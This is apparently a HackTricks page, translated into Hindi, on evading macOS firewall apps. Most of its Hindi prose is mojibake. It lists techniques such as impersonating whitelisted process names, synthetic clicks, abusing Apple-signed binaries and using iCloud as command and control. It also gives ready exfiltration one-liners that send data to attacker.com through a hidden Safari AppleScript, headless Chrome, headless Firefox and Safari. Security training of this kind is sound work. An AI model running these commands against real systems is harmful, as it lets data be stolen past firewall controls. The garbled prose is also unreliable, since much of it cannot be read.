Hindi - Ht

macOS Bypassing Firewalls

рд╣реИрдХрдЯреНрд░рд┐рдХреНрд╕ рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ

рдкрд╛рдП рдЧрдП рддрдХрдиреАрдХ

рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рддрдХрдиреАрдХреЛрдВ рдХреЛ рдХреБрдЫ macOS рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдРрдкреНрд╕ рдореЗрдВ рдХрд╛рдо рдХрд░рддреЗ рдкрд╛рдпрд╛ рдЧрдпрд╛ред

рд╕рдлреЗрдж рд╕реВрдЪреА рдирд╛рдореЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  • рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП рдореИрд▓рд╡реЗрдпрд░ рдХреЛ launchd рдЬреИрд╕реЗ рдЬрд╛рдиреЗ-рдорд╛рдиреЗ macOS рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рдирд╛рдореЛрдВ рд╕реЗ рдмреБрд▓рд╛рдирд╛

рд╕рд┐рдВрдереЗрдЯрд┐рдХ рдХреНрд▓рд┐рдХ

  • рдЕрдЧрд░ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ рдЕрдиреБрдорддрд┐ рдХреЗ рд▓рд┐рдП рдкреВрдЫрддрд╛ рд╣реИ рддреЛ рдореИрд▓рд╡реЗрдпрд░ рдХреЛ рдЕрдиреБрдорддрд┐ рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП

рдПрдкреНрдкрд▓ рджреНрд╡рд╛рд░рд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рдмрд╛рдЗрдирд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ

  • рдЬреИрд╕реЗ curl, рд▓реЗрдХрд┐рди рдЕрдиреНрдп рднреА рдЬреИрд╕реЗ whois

рдЬрд╛рдиреЗ-рдорд╛рдиреЗ рдПрдкреНрдкрд▓ рдбреЛрдореЗрди

рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЛ рдЬрд╛рдиреЗ-рдорд╛рдиреЗ рдПрдкреНрдкрд▓ рдбреЛрдореЗрдиреНрд╕ рдЬреИрд╕реЗ apple.com рдпрд╛ icloud.com рдХрдиреЗрдХреНрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рд╣реЛ рд╕рдХрддреА рд╣реИред рдФрд░ iCloud рдХреЛ C2 рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рд╕рд╛рдорд╛рдиреНрдп рдЫрд▓рдХрд░рдирд╛

рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЛ рдЫрд▓рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдЫ рд╡рд┐рдЪрд╛рд░

рдЕрдиреБрдорддрд┐ рдкреНрд░рд╛рдкреНрдд рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреА рдЬрд╛рдБрдЪ

рдЕрдиреБрдорддрд┐ рдкреНрд░рд╛рдкреНрдд рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдЬрд╛рдирдирд╛ рдЖрдкрдХреЛ рдкреЛрдЯреЗрдВрд╢рд┐рдпрд▓реА рд╕рдлреЗрдж рд╕реВрдЪреА рдбреЛрдореЗрди рдпрд╛ рдЬрд┐рди рдПрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕ рдХреЛ рдЙрди рдбреЛрдореЗрдиреЛрдВ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рд╣реИ, рдЙрдиреНрд╣реЗрдВ рдкрд╣рдЪрд╛рдирдиреЗ рдореЗрдВ рдорджрдж рдХрд░реЗрдЧрд╛ред

lsof -i TCP -sTCP:ESTABLISHED

DNS рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

DNS рдирд┐рд░реНрдзрд╛рд░рдг mdnsreponder рд╕рд╛рдЗрди рдХреА рдЧрдИ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬрд┐рд╕реЗ рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ DNS рд╕рд░реНрд╡рд░ рд╕реЗ рд╕рдВрдкрд░реНрдХ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреА рдЬрд╛рдПрдЧреАред

рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдРрдкреНрд╕ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ

  • oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

  • рдЧреВрдЧрд▓ рдХреНрд░реЛрдо

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

  • рдлрд╝рд╛рдпрд░рдлрд╝реЙрдХреНрд╕

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

  • рд╕рдлрд╛рд░реА

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ

рдпрджрд┐ рдЖрдк рдХреЛрдб рдХреЛ рдХрд┐рд╕реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдХрд┐рд╕реА рд╕рд░реНрд╡рд░ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ рддреЛ рдЖрдк рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рдЫрд▓ рд╕рдХрддреЗ рд╣реИрдВ:

macOS Process Abuse

рд╕рдВрджрд░реНрдн

рд╣реИрдХрдЯреНрд░рд┐рдХреНрд╕ рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
PreviousmacOS AppleFSNextmacOS Defensive Apps

Last updated